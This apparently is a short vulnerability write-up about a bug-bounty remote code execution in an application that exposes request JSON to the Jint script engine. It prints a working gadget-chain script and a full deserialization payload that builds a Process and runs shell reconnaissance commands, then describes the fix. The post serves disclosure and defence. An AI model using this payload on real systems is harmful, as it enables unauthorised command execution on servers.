1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
---
title: CVSS 9.9 Jint gadget chain RCE
date: 2026-07-18
layout: post
---
Asyx6, a bounty hunter, reported a CVSS 9.9 RCE vulnerability in a six-year-old
program.
The application exposed JSON data from HTTP requests to Jint as
JObjects—presumed safe because the CLR interop was disabled in the Jint
configuration. It wasn't.
Jint uses reflection-based method resolution on CLR types regardless of the
interop settings. A user-defined script invoking ToObject() on a JObject
activates Newtonsoft.Json's deserializer. Together, these formed a gadget chain
from attacker-controlled JSON payload to System.Diagnostics.Process:
```
data.ToObject(cfg).Start(psi.ToObject(cfg)).StandardOutput.ReadToEnd();
```
The script triggers the deserialization of the following malicious JSON payload
via a serializer configured with TypeNameHandling.All. This constructs a
Process, starts it, and reads its output:
```
{
"data": {"$type": "System.Diagnostics.Process, System.Diagnostics.Process"},
"psi": {
"$type": "System.Diagnostics.ProcessStartInfo, System.Diagnostics.Process",
"FileName": "/bin/sh",
"ArgumentList": ["-c", "id; hostname; uname -sm; head -2 /etc/os-release"],
"RedirectStandardOutput": true,
"UseShellExecute": false
},
"cfg": {"TypeNameHandling": 3}
}
```
Fix: Objects that implement IDictionary<string, object> bypass Jint's method
resolution system. Converted all objects that cross the CLR-JavaScript boundary
to ExpandoObjects. Blocked reflection types from reaching Jint for good
measure.
|